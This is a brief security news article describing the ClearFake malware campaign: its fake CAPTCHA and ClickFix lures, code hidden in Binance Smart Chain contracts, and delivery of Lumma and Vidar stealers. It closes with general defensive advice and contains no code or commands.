ClearFake malware is spreading quickly by tricking users with fake security verifications. Over 9,300 websites are now infected. The attackers behind ClearFake use fake reCAPTCHA and Cloudflare Turnstile pop-ups. These appear real but are used to deliver malware like Lumma and Vidar Stealer.
ClearFake first surfaced in mid-2023. It started by placing fake browser update alerts on hacked WordPress sites. However, the attack method has evolved.
Now, it uses clever techniques like EtherHiding. This method hides malicious code inside Binance Smart Chain (BSC) smart contracts. Therefore, it becomes harder to detect or remove.
The goal is to trick users into running harmful PowerShell commands. These commands download malware designed to steal information from both Windows and macOS systems.
In 2024, the campaign adopted a new trick called ClickFix. This fake error message urges users to fix a made-up problem. If followed, it installs malware.
Researchers found the attackers are using Application Binary Interfaces (ABIs) from BSC smart contracts. These ABIs load JavaScript that checks the user’s system and downloads more code.
That code contains the fake ClickFix prompt. If a user clicks it, the malware Emmental Loader (also known as PEAKLIGHT) is installed, which then drops Lumma Stealer. In another case, the malware downloaded Vidar Stealer instead. The attackers constantly update their code and lures, making detection difficult.
By July 2024, an estimated 200,000 people had seen ClearFake lures. Over 100 auto dealership websites were also infected via a third-party video provider. That provider, according to a report, unknowingly hosted malicious code that compromised client websites—a classic supply chain attack.
Other threats also emerged, including phishing emails with VHD or Excel attachments. These used old vulnerabilities to launch malware like Remcos and AsyncRAT.
How to Stay Protected
To prevent ClearFake infections, update web software regularly. Always verify reCAPTCHA and browser alerts before clicking. Use tools that block suspicious scripts and web content. Pin third-party services to trusted versions and audit them often.
Educate users about fake update prompts and social engineering tricks. Strong access controls and multi-factor authentication (MFA) also reduce risk. As threats grow smarter, organizations must stay alert and act quickly. Prevention and awareness are your best defenses.
Sleep well, we got you covered.
